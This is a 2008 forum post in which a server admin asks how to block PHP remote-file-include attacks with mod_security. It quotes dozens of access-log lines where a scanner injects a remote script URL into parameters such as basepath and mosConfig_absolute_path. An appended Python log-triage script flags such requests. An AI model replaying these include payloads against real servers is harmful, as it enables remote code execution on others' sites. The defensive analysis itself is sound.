Anybody know how to block this specific PHP inject attack using Mod_Security?

smksa

Member
Aug 1, 2006
Hi,

I would like to request some assistance.

Does anybody know how to block the following "WEB-PHP remote include path" attack using mod_security?

I have tried using the default Mod_Security and also the Mod_Security configuration from
http://www.timmit.nl/modsec2.user.conf.

But it seems that mod_security is not functioning well, as the PHP inject script is still able to run on my server. :confused:

The following are the WEB-PHP remote include path requests that I mentioned, taken from the Apache access log.


=================================

127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:30 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:31 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:31 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:23:46 +0800] "GET /?HCL_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 406 346
124.217.243.21 - - [15/Jun/2008:15:23:47 +0800] "GET /?HCL_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 406 346
124.217.243.21 - - [15/Jun/2008:15:25:14 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:25:14 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:25:15 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:25:16 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:29:07 +0800] "GET //config.inc.php?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:48:17 +0800] "GET /?name=Club&op=members&cid=2//login.php%3fskin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:48:17 +0800] "GET /?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:51:27 +0800] "GET /?language=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:51:28 +0800] "GET /?language=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:54:25 +0800] "GET /?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET /linux/9131.html//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET //login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET /linux//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET /mac/9194.html//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET //login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET /mac//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:19:10 +0800] "GET /?module=pnForum&func=viewtopic&topic=813&=&newlang=deu//phpopenchat/contrib/yabbse/poc.php%3fsourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:19:11 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:19:25 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:19:38 +0800] "GET ///modules/My_eGallery/public/displayCategory.php?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:21:37 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:24:26 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:24:36 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:24:37 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:20 +0800] "GET /die.php?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:26:21 +0800] "GET /die.php?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:26:29 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:34 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:35 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:35 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:28:33 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:31:34 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:34:59 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:35:10 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:37:44 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:38:03 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:40:06 +0800] "GET //index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
124.217.243.21 - - [16/Jun/2008:02:42:47 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:42:48 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:42:48 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:48:47 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:48:49 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:00:19 +0800] "GET /?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:04:12 +0800] "GET /?name=Sitemap//modules/My_eGallery/public/displayCategory.php%3fbasepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:04:12 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:10:08 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:10:09 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:11:16:49 +0800] "GET /kb/php_joomla//libraries/joomla/application/router.php?path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -
124.217.243.21 - - [16/Jun/2008:11:16:50 +0800] "GET /libraries/joomla/application/router.php?path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -
124.217.243.21 - - [16/Jun/2008:11:16:50 +0800] "GET /kb//libraries/joomla/application/router.php?path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -

====================================



I would appreciate it if anybody can help me stop this attack.

Thank you,

Regards,
Sham
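Added example, not part of the post or of any mod_security ruleset: a small Python 3 log-triage script that does, over access-log lines, the same check a mod_security rule over the ARGS collection would do. It parses Common Log Format lines, splits the query string into arguments, percent-decodes each value the way the engine does and then applies extra decode rounds (the role of a t:urlDecodeUni transformation), and flags any argument whose decoded value is an absolute URL, which is the remote-include indicator visible in every attack line above. The sample lines are constructed in the shape of the quoted log; the hostname example.invalid, the client 10.0.0.5 and the benign last line are made up and replace the real values. Splitting the findings by response status shows which URL-carrying requests were served (200) versus refused or not found (406/404), which is the first thing to check when judging whether a ruleset is actually blocking.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample, shaped like the access-log entries quoted in the post.
# Host, the 10.0.0.5 client and the benign last line are illustrative only.
SAMPLE_LOG = """\
127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://example.invalid/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:23:46 +0800] "GET /?HCL_path=http://example.invalid/fonts.txt%253f%253f HTTP/1.1" 406 346
127.0.0.1 - - [16/Jun/2008:02:40:06 +0800] "GET //index2.php?GLOBALS=&mosConfig_absolute_path=http://example.invalid/fonts.txt?? HTTP/1.1" 404 -
10.0.0.5 - - [16/Jun/2008:09:00:00 +0800] "GET /index.php?page=about&lang=en HTTP/1.1" 200 1200
"""

# Common Log Format: client, identd, user, [timestamp], "request line", status, bytes.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Remote-include indicator: an argument value that is an absolute URL.
# Same shape as an @rx operator applied to ARGS in a mod_security rule.
RFI_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def decode_rounds(value: str, max_rounds: int = 3):
    """Repeat percent-decoding until the value stops changing.

    parse_qsl has already decoded once (as the server/engine does); each extra
    round here plays the part of a t:urlDecodeUni transformation, which is what
    exposes double-encoded values such as fonts.txt%253f%253f.
    Returns (decoded_value, extra_rounds_applied).
    """
    rounds = 0
    while rounds < max_rounds:
        nxt = unquote(value)
        if nxt == value:
            break
        value, rounds = nxt, rounds + 1
    return value, rounds


def triage(log_text: str):
    """Return one finding per (request, argument) whose decoded value is an absolute URL."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF; a production tool would count and report these
        # Split on the first '?' by hand: urlsplit would read '//index2.php' as a host.
        path, _, query = m.group('target').partition('?')
        for name, raw in parse_qsl(query, keep_blank_values=True):
            value, extra = decode_rounds(raw)
            if RFI_RE.match(value):
                findings.append({
                    'client': m.group('client'),
                    'status': int(m.group('status')),
                    'path': path,
                    'param': name,
                    'value': value,
                    'extra_decode_rounds': extra,
                })
    return findings


def served_vs_blocked(findings):
    """Split findings into requests the application answered with 2xx and the rest
    (4xx here means refused by the server or a path that does not exist)."""
    served = [f for f in findings if 200 <= f['status'] < 300]
    other = [f for f in findings if not 200 <= f['status'] < 300]
    return served, other


if __name__ == '__main__':
    found = triage(SAMPLE_LOG)
    served, other = served_vs_blocked(found)
    for f in found:
        print(f"{f['status']} {f['client']} {f['path']} {f['param']}={f['value']} "
              f"(extra decode rounds: {f['extra_decode_rounds']})")
    print(f"{len(served)} URL-carrying request(s) served, {len(other)} not served")
```

In mod_security terms the check above corresponds to a rule over ARGS with a t:urlDecodeUni transformation and an @rx operator matching ^(?:https?|ftp)://; the engine decodes ARGS once on its own, and the transformation supplies the further round that matters when a value arrives double-encoded. Running the script over the full log from the post (with the real lines pasted into SAMPLE_LOG) lists every parameter name the scanner tried, and the served/not-served split shows directly which of them reached the application.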